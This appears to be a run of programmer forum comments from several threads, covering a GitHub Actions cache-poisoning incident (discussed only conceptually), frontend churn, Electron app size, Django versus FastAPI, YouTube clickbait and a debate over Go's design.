Ah, the comment by Foxboron clarifies that what happened here is not the job directly publishing malicious code, but rather poisoning the build cache so the main-branch CI pulls bad data in! Clever! So, just don’t give any permissions to pull_request_target jobs!
My public repos don’t run CI jobs for PRs automatically, it has to be manually approved. I think this is the default. Not sure what happened in this case though.
It is totally fine to run CI on PRs. CI for PRs does not get to use repository secrets, unless you go out of your way to include secrets.
If you think your security depends on PRs not triggering CI, then it is likely that either:
you don’t understand why your project is actually secure
your project is actually insecure
GitHub’s “don’t run CI for first-time contributors” has nothing to do with security and has everything to do with using the maintainer’s human judgement to protect GitHub’s free runner compute from being used for mining crypto.
That is, this is a feature to protect GitHub/Microsoft, not your project.
Should be easily solvable by billing those minutes to the PR creator.
I guess there is also the situation where you provide your own runner rather than buying it from GitHub. In that case it seems like a reasonable precaution to restrict unknown people from using it.
Should be easily solvable by billing those minutes to the PR creator.
Yes! I sympathize with GitHub for having to implement something here on short notice when this happened the first time, but I am dismayed that they never got around to implementing a proper solution here: https://matklad.github.io/2022/10/24/actions-permissions.html
I guess there is also the situation where you provide your own runners
Yes, the security with self-hosted runners is different. If you use non-sandboxed self-hosted runners, they should never be used for PRs.
Thank you, that’s a great summary, and a very interesting attack vector.
It’s strange (to me) that a release would be created off of an arbitrary user created branch, but I’m sure there’s a reason for it. In years and years of working with build automation I’ve never thought about that kind of code injection attack, so it’s something I’ll start keeping in mind when doing that kind of work.
Frontend technologies are relatively new compared to backend counterparts and they are still developing, thus in constant flux. What you’re experiencing is, which may sound ridiculous, a revolution. That’s why the APIs change so much, we’re still figuring this out. I have to admit it’s a lot of churn, but it’s necessary for a better future.
My suggestion would be to either choose a boring and stable alternative, e.g. Ember, or stay on the current major version and push against the FOMO. Switching to htmx works well too, albeit a large refactor IMO, with tradeoffs that may be too much depending on project requirements.
Frontend technologies are relatively new compared to backend counterparts and they are still developing, thus in constant flux. What you’re experiencing is, which may sound ridiculous, a revolution. That’s why the APIs change so much, we’re still figuring this out. I have to admit it’s a lot of churn, but it’s necessary for a better future.
Is it, though? Frontend is basically doing, these days, the work that a GUI toolkit used to do on the desktop, since frontend developers have decided to reject the platform-native toolkit and implement their own, using the browser only as a low-level rendering target. You do see some churn in desktop GUI toolkits, but nothing like in web frontend.
Fair point, and since I have zero experience in native UI development I can’t say much. But lately I’ve seen React influence mobile development, e.g. SwiftUI and Jetpack Compose, which must’ve meant some churn for mobile devs, and shows there was room for innovation.
I will agree Android development churns about as much as web frontend development. I was thinking more about desktop UIs, which have been a lot more stable. You can run Win32 apps from the late 90s on modern Windows, and I believe you could mostly rebuild them without changes. You can rebuild NeXTSTEP apps for modern macOS with very few changes.
I’ve heard that Windows is legendary in terms of backwards compatibility, probably due to enterprise customers they have.
“With very few changes” depends on how many changes you consider to be very few. The author complains about TanStack Query, but v5 comes with a codemod that does the job for you.
While I haven’t done any desktop app development, I’ve heard that retained mode graphics (which I gather is the default for desktop toolkits) is harder to develop and I enjoy that the industry started to adopt immediate mode graphics.
The maintenance burden is what matters; the last thing I want to be doing after I finally get back to a personal project is fight with the hip system of the day, update dependencies with breaking changes, find out there is no replacement for one lib I’m using and it’s abandoned / no longer compiles if I update the common dependencies it shares with other libs, etc.
I want to come back months later and be able to work on a personal project, not spend my fleeting time maintaining it. Tech stack here matters
It’s insane to me that people accept the BS work of keeping up with the version treadmill. Don’t you want to be doing things other than fiddling with code that was working fine yesterday?
I think many developers feel that any code containing bugs (or that hasn’t seen an update in some period of time) is a potential exploit and the only thing to do is to constantly update the code. Yes, I want to do other things than fiddle with code that was working fine yesterday, but I think that’s (sadly) a minority position these days.
Yes, I am considering this, since multiple people gave me the same feedback.
I didn’t go into too much detail about the Go+HTMX+Templ stack because I wanted to keep the blog post short and focus exclusively on the topic of dependency management.
I’m maintaining a React app at work in production and am looking fondly at htmx, lol. The whole React stack has a bonkers level of complexity. The constant flow of upgrades and security vulns. The evolving ‘best practices’ every couple of years. The Node and npm breakages. Having to move away from the deprecated CRA to Vite and Vitest. The list goes on.
Is it just me, or does genAI content in a talk make you wary of how much effort has been put into it?
Is the whole talk generated?
How much of it is generated by a robot? Can it be trusted?
I am biased against using genAI due to having many artist friends.
I don’t think the speaker here has done anything wrong really, just using the tools they have I suppose.
But it’s this nagging feeling that something is off. Kinda like the generated content always looks off. And it’s hard to trust it due to that.
It’s not just you. I think the way we’ve typically assessed the quality of human to human communication at a first approximation leans heavily on the relative expense of signaling: is the talk grammatically correct, laid out well visually, flows well, etc. All of these things point to “the speaker spent some time outlining their thoughts in a cohesive manner, so the content could be worthwhile.”
Then there’s genAI images, where you type what you want, and it spits out something in 1 minute, ready to use. Totally messes with our heuristic outlined above. Except it has nothing to do with the content itself! As a counter-point: we probably wouldn’t have an issue with a meme, despite it being easy to locate and put in.
We’ve all read posts where the images and content were clearly AI-written. I think we’re just adapting to the idea that parts of something could use AI in the process without compromising the content.
It’s funny how these signalling issues mirror some of the older issues from my childhood. I have cerebral palsy, and there was resistance in the 80’s and 90’s to allowing me to submit my homework assignments typed instead of handwritten.
Quality penmanship was a signal that deliberate effort had been put into an assignment.
The use of white-out on the page told the reader that this work was a first draft, instead of a hand written copy of an earlier pencil draft. This signal wasn’t present in typewritten documents.
There was no way to prove that I hadn’t used a spellchecker.
Removing these external signals would give me an unfair advantage over other students. Thankfully, I only had one teacher who refused to budge on the issue due to his philosophical idealism.
I’m not saying any of this as a supporter of AI (e.g. I don’t use any LLM in my own coding work). I’m mostly just finding it funny the way that history rhymes.
At least in your example, the input is from your brain, the output just looks different.
In genAI case, the input is not really what you say, but some soup of copy pasted stuff from scraped material, and then that pretends to be human output.
in particular, if we ignore the spellchecker point:
printed text is lower entropy than handwritten text, but the information that is there is all intentional; whereas
an ai generated image comprises not much more information than the prompt that generated it, but the presentation is burdened with noise; a human-made image contains high entropy but little noise
*nod* I’m reminded of a great article named Targeted Advertising Considered Harmful that goes into the biological signalling theory (i.e. peacock tails) angle.
The introduction of targeted advertising made online ads in general worthless as a signal to the potential customer that the vendor wasn’t a fly-by-night scam.
I was (and still am to a lesser extent) an AI skeptic for writing code. Sonnet is what made me pay attention.
I’ve had some luck with v0 for UIs as well. Are there any other models that devs really like for software development?
DeepSeek R1 itself has really impressed me: https://simonwillison.net/2025/Jan/27/llamacpp-pr/
Claude is still my default, but if I have a problem that might benefit from “reasoning” about it - things like debugging a complex bug caused by code across multiple different files - I’ll try o1 or R1 and see if they can spot something that Claude doesn’t.
We’ve passed the inflection point. Deepseek wrote 99% of the code improving itself…
Well, one commit that was arguably rote according to some
My “TL;DR” summary:
Everyone does it, nobody cares, so it’s fine.
Slightly longer: the post asserts 4 main points. The author fails to adequately defend any of them. I feel that the 3 main points he tries to defend all fail. I feel all 4 objections are valid and disagree with all of his attempted defences.
This is the attitude that enables enshittification: “most users” will keep using our product despite us degrading the experience.
The dev version of this: “$POPULAR_FRAMEWORK is popular, and it must be popular because it is good, therefore $POPULAR_FRAMEWORK is good.” If you lack the imagination to see literally any other way to implement it, the experience of using something else, or lack the ability to assess the tradeoffs, it is easy to fall into this trap. It is much cognitively cheaper to outsource the hard work of critically evaluating technology to other people. The problem arises when most everyone does the same thing, creating a closed system that stalls out at local maxima. (cough)
Think about the prevailing assessment, which dominated web discourse in the early 2010s, that static types were worthless boilerplate. And then TS flipped that opinion around; people swear by static types now. That collective everyone changed their mind, which was good. But it should also instill doubt in those paying attention as to whether that collective everyone’s takes are as infallible as they purport to be.
I totally agree. Specifically, people arguing over bundle size is ridiculous when compared to the amount of data we stream on a daily basis. People complain that a website requires 10mb of JS to run but ignore the GBs in python libs required to run an LLM – and that’s ignoring the model weights themselves.
There’s a reason why Electron continues to dominate modern desktop apps and it’s pride that is clouding our collective judgement.
https://bower.sh/my-love-letter-to-front-end-web-development
As someone who complains about Electron bundle size, I don’t think the argument of how much data we stream makes sense.
My ISP doesn’t impose a data cap—I’m not worried about the download size. However, my disk does have a fixed capacity.
Take the Element desktop app (which uses Electron) for example; on macOS the bundle is 600 MB. That is insane. There is no reason a chat app needs to be that large, and to add insult to injury, the UX and performance is far worse than if it were a native client or a Qt-based application.
Mine does and many ISPs do. Disk space is dirt cheap in comparison to bandwidth costs
Citation needed.
See native (Qt-based) Telegram client.
Is it because it uses Electron that the bundle size is so large? Or could it be due to the developer not taking any care with the bundle size?
Offhand I think a copy of Electron or CEF is about ~120-150MB in 2025, so the whole bundle being 600MB isn’t entirely explained by just the presence of that.
I’m not so sure… the “minimal” spotify build is 344 MB:
And if you decompress it (well, this is an older version but I don’t wanna download another just for a lobsters comment):
1.3 GB libcef.so, no slouch.
Hm. I may be looking at a compressed number? My source for this is that when the five or so different Electron-or-CEF based apps that I use on Windows update themselves regularly, each of them does a suspiciously similar 120MB-150MB download each time.
I don’t think the streaming data comparison makes sense. I don’t like giant electron bundles because they take up valuable disk space. No matter how much I stream my disk utilisation remains roughly the same.
Interesting, I don’t think I’ve ever heard this complaint before. I’m curious, why is physical disk space a problem for you?
Also “giant” at 100mb is a surprising claim but I’m used to games that reach 100gb+. That feels giant to me so we are orders of magnitude different on our definitions.
When a disk is getting full due to virtual machines, video footage, photos, every bit counts and having 9 copies of chromium seems silly and wasteful.
Also, the problem of disk space and memory capacity becomes worse when we consider the recent trend of non-upgradable/non-expandable disk and memory in laptops. Then the money really counts.
Modern software dev tooling seems to devolve to copies of copies of things (Docker, Electron) in the name of standardizing and streamlining the dev process. This is a good goal, but, hope you shelled out for the 1TB SSD!
At least games have the excuse of showing a crapload of eye candy (landscapes and all that).
Funny, even within this thread people are claiming Electron apps have “too much eye candy” while others are claiming “not enough”
I believe @Loup-Vaillant was referring to 3D eye candy, which I think you know is different from the Electron eye candy people are referring to in other threads.
A primary purpose of games is often to show eye candy. In other words, sure, games use more disk space, but the ratio of disk space actually used to disk space inherently required by the problem space is dramatically lower in games than in Electron apps. Context matters.
I care because my phone has limited storage. I’m at a point where I can’t install more apps because they’re so unnecessarily huge. When apps take up more space than personal files… it really does suck.
And many phones don’t have expandable storage via SD card either, so upgrading creates e-waste. And some builds of Android don’t allow apps to be installed on external storage either.
Native libraries amortize this storage cost via sharing, and it still matters today.
Does Electron run on phones? I had no idea, and I can’t find much on their site except info about submitting to the macOS app store, which is different to the iOS app store.
Well, Electron doesn’t run on your phone, and Apple doesn’t let apps ship custom browser engines even if they did. Native phone apps are still frequently 100mb+ using the native system libraries.
It’s not Electron but often React Native, and other Web based frameworks.
There are definitely some bloated native apps, but the minimum size is usually larger for the web-based ones. Just shipping code as text, even if minified, is a lot of overhead.
Offhand I think React Native’s overhead for a “Hello world” app is about 4MB on iOS and about 10MB on Android, though you have to turn on some build system features for Android or you’ll see a ~25MB apk.
I am not convinced of this in either direction. Can you cite anything, please? My recollection is uncertain, but I think I’ve seen adding a line of source code to a C program produce object code that grew by more bytes than the source line itself contained. And C is a PL which tends towards small object code size, and that’s without gzipping the source code or anything.
I don’t have numbers but I believe on average machine code has higher information density than the textual representation, even if you minify that text.
So if you take a C program and compile it, generally the binary is smaller than the total text it is generated from. Again, I didn’t measure anything, but knowing a bit about how instructions are encoded makes this seem obvious to me. Optimizations can come into play, but I doubt it would change the outcome on average.
That’s different to what I’m claiming. I’d wager that change caused more machine code to be generated because before some of the text wasn’t used in the final program, i.e. was dead code or not included.
Installed web apps don’t generally ship their code compressed AFAIK, that’s more when streaming them over the network, so I don’t think it’s really relevant for bundle size.
IPA and APK files are both zip archives. I’m not certain about iOS but installed apps are stored compressed on Android phones.
I’m not sure about APK, but IPAs are only used for distribution and are unpacked on install. Basically like a .deb, or a DMG on macOS. So AFAIK, it’s not relevant for disk space.
FWIW phone apps that embed HTML are using WebView (Android) or WKWebView (iOS). They are using the system web renderer. I don’t think anyone (except Firefox for Android) is bundling their own copy of a browser engine because I think it’s economically infeasible.
Funnily enough, there’s a level of speculation that one of the cited examples (Call of Duty games) is large specifically to make storage crunch a thing. You already play Call of Duty, so you want to delete our 300GB game and then have to download it again later to play other games?
Learn Django and FastAPI. Also, learn three more. Learn that weird new thing that your friend at work keeps mentioning, and learn the up-and-comer you’ve seen make headlines each week. You don’t need to become an expert in all of them, but you can only make the choice “based on your project requirements” if you know what the options are at decision time.
One tool is a screwdriver and one is a can opener. Learn both.
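To make the screwdriver/can-opener contrast concrete, here’s the minimal FastAPI shape (a sketch in its standard tutorial style); Django’s version of the same endpoint drags in a project, urls.py, settings, and an ORM model, which is exactly the point of Django:

    from fastapi import FastAPI

    app = FastAPI()

    @app.get("/items/{item_id}")
    def read_item(item_id: int, q: str | None = None):
        # Path and query params are parsed and validated from the type hints.
        return {"item_id": item_id, "q": q}

One is a thin, typed HTTP layer; the other is a batteries-included application kit.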
This mentality works if you have a lot of free time. I think you should learn a thing deeply first before just spreading yourself like butter on a freshly toasted bagel. Otherwise you’re just noticing surface level differences and not differences in architectures and design decisions.
Learning one thing well is worth it. Once you start hating some of its decisions, you can try something else, and find that you hate it for different decisions it made. :)
Yes! People are always asking for excuses to not learn, but you should learn whatever interests you and more.
It “bothers” me a bit that alternatives to the Django admin are so scarce.
Also, because SPAs have a huge mindshare, most of the interesting work is happening in that space. Traditional server-side rendered apps, while having some resurgence thanks to HTMX and similar frameworks… well, there are established players, but it doesn’t feel like there’s much innovation. Perhaps traditional frameworks are stable and don’t really need more than slow evolution.
And the rift is a huge issue. I see there’s stuff to build using server-side rendering, but even though I don’t like SPA development, there’s plenty of stuff that is better as an SPA! (And we also lack more competition in Electron-style apps!)
Myself, when I look at FastAPI, I like it a lot. But most things I want to do fit server-side rendering better in my head, and I kinda always need something like the admin, so I still turn to Django frequently.
There’s something fundamental in the difference between a frontend dev who needs a backend and a backend dev who needs a SSR UI, and you see it reflected in the frameworks.
Frontend-oriented frameworks put most of their skill points in making sure that frontend dev is cozy, often with really nice live reloading via Vite. Full-stack frameworks say, “here’s a templating language.” Frontend frameworks say, “here’s the bare minimum needed to handle a web request.” Some full-stack frameworks get deep into the weeds with domain modeling and let you elegantly model a domain far beyond simple HTTP handlers. The worst situation to be in is when you can appreciate what both worlds offer you, as very few options exist that give you all the benefits here.
Personally, I do UI dev in Astro with the hyper fast hot reload, and move it over to templates for SSR. Domain modeling is too important to give up for me. I find I lose a lot of time trying to recreate things that you get for free in full stack frameworks.
But there’s a real opportunity for someone to cross the streams here. It’d probably have to be in TS, which isn’t my favorite language, or someone can figure out how to use React/Vue/Svelte components for SSR rendering.
You might be interested in django-ninja. It feels more like FastAPI than DRF does, uses pydantic, and lets you keep the batteries you like (including admin).
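For a taste, a minimal sketch in django-ninja’s documented style (the endpoint is made up):

    from ninja import NinjaAPI

    api = NinjaAPI()

    @api.get("/add")
    def add(request, a: int, b: int):
        # Query params are parsed and validated from the type hints, FastAPI-style.
        return {"result": a + b}

    # urls.py: include path("api/", api.urls); the admin keeps living alongside it.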
The thing is, I don’t use DRF either. Most of the things I do can be done with plain Django SSR and 0 APIs.
If I wanted to look at increasing UI sophistication, I think I would start with HTMX or a similar project.
If I really needed an API (and I can see scenarios for this, of course), then I would look at other options, yes.
It sounds like we might do similar things, then. I rarely need an API; when I do it’s just for one or two things, not for all of my UI.
I’ve used HTMX regularly for a little while now, including in production. In my production use of it, I used django-template-partials, and it’s pretty nice. I’ve been experimenting with cotton in some prototyping, and think I’ll probably use that in the future where I’m currently using template partials.
I worked through the hypermedia systems book using django and HTMX in public, and found the exercise extremely useful. I wrote about my work here. The nice thing is that the workflow for something enhanced with HTMX is so similar to the plain-old-templates I’m used to.
For exploratory programming, I have recently tried out NanoDjango a few times, and I really like it. It lets me keep all the admin goodness I like about django but really lowers the impedance for trying something out quickly. And its “convert” command turns things into a normal django project if I decide they need to have a longer useful life.
When you mentioned that you liked the look of FastAPI, I was thinking about the API part. But NanoDjango gets at that low-impedance feeling for starting a project.
Huh, NanoDjango looks intriguing, I’ll look at it, thanks.
The last few times I’ve dabbled with Django I had a few goes at trying to make the first-steps experience a bit smoother; like incorporating dj-database-url, uv, and a few other odds and ends that end up being boilerplate-ish for having an easy-to-deploy, smooth initial setup. Likely there’s a million other better approaches out there with more polish, but… it’s how we are.
How we manage applications has changed pretty significantly. We don’t need custom solutions much anymore with SPAs and static file hosting.
The Django admin is a rapid CRUD framework with (primitive) change tracking and some authorization support.
This is not only hugely useful, but it even encourages you to store in the database stuff that you would otherwise hardcode in the source code.
It is not perfect by any means, but there are very few things like it, and for many projects it puts you one step ahead in productivity.
…
I have certainly switched some stuff to be based in source code and use a Git forge’s support for editing files via a web UI with code review for some purposes, so there’s a small overlap, but still a lot of things I do benefit from the admin.
Case in point: I wrote a small scraper to collect versions from upstream projects and their YunoHost package. I use the Django admin to maintain scraping exceptions. It’s great. I could edit a YAML via the forge web UI, or just with my local editor + git, but in this case, it works so much better.
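For anyone who hasn’t seen it, the whole cost of getting that admin UI is roughly this (model and field names hypothetical):

    # admin.py in your app
    from django.contrib import admin
    from .models import ScrapingException  # hypothetical model

    @admin.register(ScrapingException)
    class ScrapingExceptionAdmin(admin.ModelAdmin):
        # Columns and a search box for the list view; forms, filters,
        # and change history come along without extra code.
        list_display = ("package", "reason", "updated_at")
        search_fields = ("package",)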
I guess it’s a difference in opinion; I’d prefer something like that to be checked in and linted, or to have logic in the app itself to confirm exceptions are valid inputs.
I was looking for this in Nest and found a project half a decade unmaintained. There was a newfangled Rust framework that had this on its roadmap, kinda.
Most people say that given an OpenAPI spec it should be ‘easy’ to create a generic web CRUD editor for it, but nobody seems to be bothered to build one that is usable.
What’s Nest?
Yes, the most brilliant minds of our generation are ignoring this problem. The “optimist” answer is that you cannot really make CRUD nicer than what it is. (E.g: there’s so much variation that CRUD frameworks will always have narrow use cases.)
I have written two CRUD frameworks. The first one got along quite far, with many sophisticated features, but it had some basic flaws. My second one has a stronger foundation, and indeed it still powers one personal app… but I never had the need to develop more features… so I still rely on Django for most things :(
Coming from Django I can’t emphasise how much of a step down this pile of crap is (but that is the TS/JS culture that this is considered good and popular): https://nestjs.com
I wonder if I’ll live to see the day where we can talk about a language without putting a different language down.
The YouTube channel here seems to be a person who needs to be dramatic for view reasons. I think the actual content, and the position of the Ghostty author here on this topic, is pretty mild.
An actual bit from the video:
Guest: “…I don’t know, I’m questioning everything about Go’s place in the stack because […reasonable remarks about design tradeoffs…]”
Host: “I love that you not only did you just wreck Go […]”
Aside… In the new year I’ve started reflexively marking videos from channels I follow as “not interested” when the title is clickbait, versus a succinct synopsis of what the video is about. I feel like clickbait and sensationalism on YouTube is out of control, even among my somewhat curated list of subscribed channels.
This is why I can’t stand almost any developer content on YouTube and similar platforms. They’re way too surface-level, weirdly obsessed with the inane horse race of finding the “best” developer tooling, and clickbait-y to a laughable degree. I have >20 years of experience, I’m not interested in watching someone blather on about why Go sucks when you could spend that time on talking about the actual craft of building things.
But, no, instead we get an avalanche of beginner-level content that lacks any sort of seriousness.
This is why I really like the “Developer Voices” channel. Great host, calm and knowledgeable. Interesting guests and topics. Check it out if you don’t know it yet.
Very nice channel indeed. Found it accidentally via this interview about Smalltalk and enjoyed it very much.
Do you have other channel recommendations?
I found Software Unscripted to be pretty good too. Not quite as calm as Developer Voices, but the energy is positive.
Thanks! Didn’t know Richard Feldman hosted a podcast, he’s a good communicator.
Signals and Threads is another great podcast, though it doesn’t seem to have a scheduled release cadence.
Thanks for the suggestion. I will check it out!
I’m in a similar boat. Have you found any decent channels that aren’t noob splooge? Sometimes I’ll watch Asahi Lina, but I haven’t found anything else that’s about getting stuff done. Also, non-OS topics would be nice additions as well.
As someone else said, Developer Voices is excellent, and on the opposite end of the spectrum from OP.
Two more:
The Software Unscripted podcast publishes on YouTube too, and I enjoy it a fair bit at least in the audio only format.
Book Overflow, which focuses on reading a software book about once every two weeks and talking about it in depth.
Seven (7!) years ago LTT made a video about why their thumbnails are so… off-putting, and it essentially boiled down to “don’t hate the player; hate the game”. YouTube rewards that kind of content. There’s a reason why nearly every popular video these days is some variant of “I spent 50 HOURS writing C++” with the thumbnail having a guy throwing up. If your livelihood depends on YouTube, you’re leaving money on the table by not doing that.
It’s not just “Youtube rewards it”, it’s that viewers support it. It’s a tiny, vocal minority of people who reject those thumbnails. The vaaaaast majority of viewers see them and click.
I don’t think you can make a definitive statement either way because YouTube has its thumb on the scales. Their algorithm boosts videos on factors other than just viewer click through or retention rates (this has also been a source of many superstitions held by YouTubers in the past) and the way the thumbnail, title and content metas have evolved make me skeptical that viewers as a whole support it.
What is the alternative? That they look at the image and go “does this person make a dumb face” ? Or like “there’s lots of colors” ? I think the simplest explanation is that people click on the videos a lot.
…or it’s just that both negative and positive are tiny slices compared to neutrals but the negative is slightly smaller than the positive.
(I use thumbnails and titles to evaluate whether to block a channel for being too clickbait-y or I’d use DeArrow to get rid of the annoyance on the “necessary evil”-level ones.)
then you have chosen poorly.
No, I think it’s okay for people to make great content for a living.
I am quite happy to differ in opinion to someone who says ‘great content’ unironically. Anyway your response is obviously a straw man, I’m not telling Chopin to stop composing for a living.
Your personal distaste for modern culture does not make it any higher or lower than Chopin, nor does it invalidate the fact that the people who make it have every right to make a living off of it.
They literally don’t have a right to make a living from Youtube, this is exactly the problem. Youtube can pull the plug and demonetise them at any second and on the slightest whim, and they have absolutely no recourse. This is why relying on it to make a living is a poor choice. You couldn’t be more diametrically wrong if you tried. You have also once again made a straw man with the nonsense you invented about what I think about modern culture.
How’s that any different from the state of the media industry at any point in history? People have lost their careers for any reason in the past. Even if you consider tech or any other field, you’re always building a career on top of something else. YouTube has done more to let anyone make a living off content than any other stage in history, saying you’re choosing poorly to make videos for YouTube is stupid.
You’re the one who brought it up:
Isn’t this kind of a rigid take? Why is depending on youtube a poor choice? For a lot of people, I would assume it’s that or working at a fast-food restaurant.
Whether that’s a good long-term strategy, or a benefit to humanity is a different discussion, but it doesn’t have to necessarily be a poor choice.
Not really?
I mean sure if you’ve got like 1000 views a video then maybe your livelihood depending on YouTube is a poor choice.
There’s other factors that come into this, but if you’ve got millions of views and you’ve got sponsors you do ad-reads for money/affiliate links then maybe you’ll be making enough to actually “choose” YouTube as your main source of income without it being a poor choice (and it takes a lot of effort to reach that point in the first place).
We’ve been seeing this more and more. You can, and people definitely do, make careers out of YouTube and “playing the game” is essential to that.
Heh - I had guessed who the host would be based on your comment before I even checked. He’s very much a Content Creator (with all the pandering and engagement-hacking that implies). Best avoided.
Your “ghostty author” literally built a multibillion dollar company writing Go for over a decade, so Im pretty sure his opinion is not a random internet hot take.
Yup. He was generally complimentary of Go in the interview. He just doesn’t want to use it or look at it at this point in his life. Since the Lobsters community has quite an anomalous Go skew, I’m not surprised that this lack of positivity about Go would be automatically unpopular here.
And of course the title was click-baity – but what can we expect from an ad-revenue-driven talk show?
My experience is that Lobste.rs is way more Rust leaning than Go leaning, if anything.
We have more time to comment on Lobsters because our tools are better ;)
Waiting for compile to finish, eh?
Hahahahaha. Good riposte!
I was able to get the incremental re-builds down to 3-5 seconds on a 20kloc project with a fat stack of dependencies which has been good enough given most of that is link time for a native binary and a wasm payload.
`cargo check` via rust-analyzer in my editor is faster and does enough for my interactive workflow most of the time.
Yeah, Haskell is so superior to Rust that’s not even fun at this point.
It’s funny you say that because recently it seems we get a huge debate on any Go-related post :D
First thought was “I bet it’s The Primeagen.” Was not disappointed when I clicked to find out.
Don’t be a drama queen ;-) You can, all you want. That’s what most people do.
The host actually really likes Go, and so does the guest. He built an entire company where Go was the primary (only?) language used. It is only natural to ask him why he picked Zig over Go for creating Ghostty, and it is only natural that the answer will contrast the two.
i can’t upvote this enough
Still rocking an iPhone 12 mini. The modern web can be pretty brutal on it at times: pages crashing, browser freezing for 10s at a time. It has honestly curtailed my web use on the go significantly, so I’m mostly okay with it on the whole.
Most things I absolutely need I can get an app for that will run better usually. The only real issue is the small screen size is obviously not being designed for anymore, and that’s becoming more of an issue.
I didn’t realize how many apps were essentially web applications until I enabled iOS lockdown mode. Suddenly I was having to add exceptions left and right for chat apps, my notes app, my Bible app, etc.
But even web-powered apps do seem snappier than most websites. Maybe they’re loading less advertising/analytics code on the fly?
I’m on a 2022 iPhone SE, and feel the same way. (My screen may be a bit smaller than yours?) The device is plenty fast, but it’s becoming increasingly clear that neither web designers nor app developers test much if at all on the screen size, and it can be impossible to access important controls.
TBH, I would cheerfully carry a flip phone with the ability to let other devices tether to it for data connectivity. Almost any time I really care about using the web, I have a tablet or a laptop in a bag nearby. A thing that I could talk on as needed and that could supply GPS and data to another thing in my bag would really be a sweet spot for me.
Maybe you want a Lightphone? They can tether.
That is exactly the kind of thing I’d like. I’d probably need to wait for the 5G version, given the 4G signal strength in a few of the places I tend to use data.
that was just 30 seconds off the top of my head.
go is great if you are an amateur with no taste, like 99% of google employees.
Gotta say, it’s a bad look to just throw out insults like “go is great if you are an amateur”. Clearly many non-amateurs use it effectively.
I think you can be better.
In the most charitable interpretation, it’s only a restatement of something from the article:
So you could even argue that “Go being great if you’re an amateur with no taste” was an explicit design goal, and perhaps we should ask Rob Pike to be better.
Ah, the good “everyone who disagrees is dumb and uncivilized” argument.
As we all know, Pike, Thompson, Griesemer, Cox, et al. have no idea what they’re doing. [/irony]
It’s fine to disagree on things, have different opinions and criticism. Heck, that’s how people decide what language they wanna use. But the reason there are more than a handful of languages with different designs is probably not that everyone else is dumber than you.
And should “amateur” in fact not be meant as an insult, then the argument essentially becomes “to use Zig you have to be smart and not make mistakes”, which, judging by your other comments, doesn’t seem to be your opinion either.
Trying to give you the benefit of the doubt here, since other than me personally not liking certain design choices I think Zig seems like a great project overall.
Go was explicitly designed for fresh university graduates at google, thus, amateurs. And as Pike himself says, quoted in the linked article, for people with no taste (“They’re not capable of understanding a brilliant language”). Andrew’s assessment is completely fair.
That Pike quote has been used as a stick to beat him with since 2012. I have a note about it.
It’s from a talk, so likely extemporised.
Here’s the full quote:
Source:
http://channel9.msdn.com/Events/Lang-NEXT/Lang-NEXT-2014/Fro…
https://talks.golang.org/2012/splash.article
While it’s nice to see the full quote, it doesn’t invalidate what I said, nor do I feel the sentiment is all too different in its full context.
I think it’s pejorative to state that recent CS graduates who have started working at Google before 2012 “have no taste”. No experience at writing production software at scale, sure. But software development is so much more than language.
I haven’t watched the talk, so I don’t know if the term “brilliant language” is used semi-ironically. Neither C, Java, nor COBOL for that matter are considered “brilliant”, but they have been used to write a lot of software. There’s a law of large numbers in play when it comes to writing software at scale, which means that you necessarily have to cater to the lowest common denominator of developers, which even at Google at its prime was probably lower than the average commenter here ;)
I am fully in agreement that Golang was probably a great fit for Google, and maybe still is. Its popularity outside Google is probably due to good marketing, “if we copy Google we too will succeed”, and a genuine demand for a “C-like with garbage collection and concurrency”.
For use outside Google, that last part, “C-like with garbage collection”, is, I suggest, a big part of its appeal. If one already knows how to write reasonable C, it is a useful mechanism to have, and less risky for small to medium sized companies than depending upon D.
If one has folks who are familiar with C, and a problem to tackle which does not require manual memory management, nor the tricky performance things C is often used for, then it seems an obvious option. Without dragging in a lot of the pitfalls of C++, or the complexities of other languages. I’ve occasionally proposed it in such cases.
I have actually chosen to use Go for one project, specifically because of its good CSP support, as the problem domain lent itself to such a design approach. However one had to be aware of certain risks: lack of immutable pointers for sends over channels, ensuring one nil’ed a pointer after sending (moving ownership), being wary of sending structs containing slices (see the sketch below), avoiding accidental mutable captures when spawning goroutines from interior functions, etc.
Despite that it was still the easiest approach to sharing work on said program with others not familiar with the CSP approach. In many ways one can view Go as the Alef with a GC which Pike wanted Winterbottom to make, for CSP tasks it reasonably serves in that role. However it would (IMHO) be better if it had a few more of the issues I mention above addressed; that’ll have to wait for some future language.
As to general concurrency, I’ve seen a lot of Go written in a threads-plus-mutex-protecting-structs style which one often sees in C and C++, so I suspect most people are not making the effort to analyse in the CSP style, or more likely are simply unaware of it.
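To make the slice risk I listed above concrete, here is a minimal sketch (hypothetical names, not from the actual project): a channel send copies the struct, but a slice field is only a header, so sender and receiver silently share the backing array unless you explicitly copy or nil it.

```go
// Minimal sketch of the "structs containing slices" pitfall: the
// channel send copies Msg, but Msg.Data is just a slice header, so
// both sides alias the same backing array.
package main

import "fmt"

type Msg struct{ Data []byte }

func main() {
	ch := make(chan Msg, 1)
	buf := []byte("hello")

	ch <- Msg{Data: buf} // only the header is copied; ownership is not moved
	buf[0] = 'X'         // the "sender" keeps mutating the shared array

	m := <-ch
	fmt.Println(string(m.Data)) // prints "Xello", not "hello"
}
```

The disciplined fix is to copy the slice (or nil the sender’s reference) before sending, which is exactly the kind of convention the compiler never checks for you.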
You are saying a lot of things, but what’s your point? Nothing of that invalidates the original statement.
My point is that constantly quoting a 12 year old remark as an anti-golang trope is lazy and borderline intellectually dishonest.
I think Rob Pike knows more about Google’s workforce than most of his detractors do - and that hiring a bright young person directly from university does not give you a seasoned software developer. I also believe that an appreciation for “brilliant languages” in relation to software development is something that is developed over time, at which time the person hired by Google is probably doing something more valuable to the company bottom line than writing code.
I don’t think it’s intellectually dishonest to bring up a rude and dismissive quote from one of the designers of golang stating that golang is a dumbed-down language because its target userbase is too stupid to understand a better language.
I disagree. Disliking a language because it has multiple technical issues, like others have pointed out in this thread and others, is defensible. Disliking it because its creator said something inappropriate is not.
Even the most generous reading I can muster for Pike’s infamous remarks is something like “we want new graduates with limited breadth and depth of experience to be able to make productive contributions without having to learn a lot of new stuff.” I think the criticism of Go that is pegged to Pike’s remarks is not dislike because of what he said, it’s that its deficiencies exist in part because of the design goals these remarks lay bare. The remarks provide evidence that Go’s design was targeted at novices (“amateurs with no taste”, if you like) from whom economic productivity is expected immediately, rather than professionals with an unbounded capacity for learning and independent interest in doing excellent work.
Maybe. I still think a bunch of nerds got really angry at Pike because they didn’t get jobs at Google back in the day despite being fluent in Haskell, and they will never forget nor forgive.
I have another reason to think Pike’s quote is unattractive: it’s devious rhetoric.
